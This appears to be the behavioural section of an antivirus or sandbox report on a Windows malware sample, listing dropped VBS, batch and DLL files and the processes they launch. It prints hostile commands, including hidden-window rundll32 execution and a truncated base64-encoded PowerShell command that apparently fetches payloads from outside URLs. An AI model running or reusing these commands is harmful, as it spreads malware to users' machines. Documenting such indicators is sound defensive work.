Technical Information
- '<SYSTEM32>\wscript.exe' %ALLUSERSPROFILE%\oue4hjld.vbs
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1492
- %ALLUSERSPROFILE%\oue4hjld.vbs
- %ALLUSERSPROFILE%\bhnasleil.bat
- %TEMP%\975443.cvr
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\bhnasleil.bat" "' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c start /B %WINDIR%\syswow64\rundll32.exe %ALLUSERSPROFILE%\vxcjkfhd.dll,ganw4ls' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\bhnasleil.bat" "
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JABNAEoAWABkAGYAcwBoAEQAcgBmAEcAWgBzAGUAcwA0AD0AIgBoAHQAdABwADoALwAvAG0AaQBkAG4AaQBnAGgAdABzAGkAbAB2AGUAcgBjAHIAYQBmAHQAZQByAHMALgBjAG8AbQAvAHMAdABvAHIAZQAvAHcAQgBqAE4ATwBVAHcALwAsAGgAdAB0...
- '<SYSTEM32>\cmd.exe' /c start /B %WINDIR%\syswow64\rundll32.exe %ALLUSERSPROFILE%\vxcjkfhd.dll,ganw4ls
- '%WINDIR%\syswow64\rundll32.exe' %ALLUSERSPROFILE%\vxcjkfhd.dll,ganw4ls